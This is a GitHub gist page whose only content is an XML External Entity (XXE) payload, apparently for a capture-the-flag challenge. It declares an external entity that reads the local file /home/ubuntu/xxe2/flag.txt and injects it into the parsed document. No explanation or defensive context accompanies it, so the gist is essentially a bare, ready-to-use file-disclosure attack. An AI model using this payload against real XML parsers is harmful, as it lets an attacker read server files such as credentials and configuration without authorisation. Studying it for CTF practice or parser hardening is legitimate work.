Skip to content

Instantly share code, notes, and snippets.

@LionZXY
Last active March 13, 2018 17:08
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save LionZXY/42e1708e7b5b3c278ded228fec6113e6 to your computer and use it in GitHub Desktop.
Save LionZXY/42e1708e7b5b3c278ded228fec6113e6 to your computer and use it in GitHub Desktop.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"file:///home/ubuntu/xxe2/flag.txt">
]>
<foo>
&bar;
</foo>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment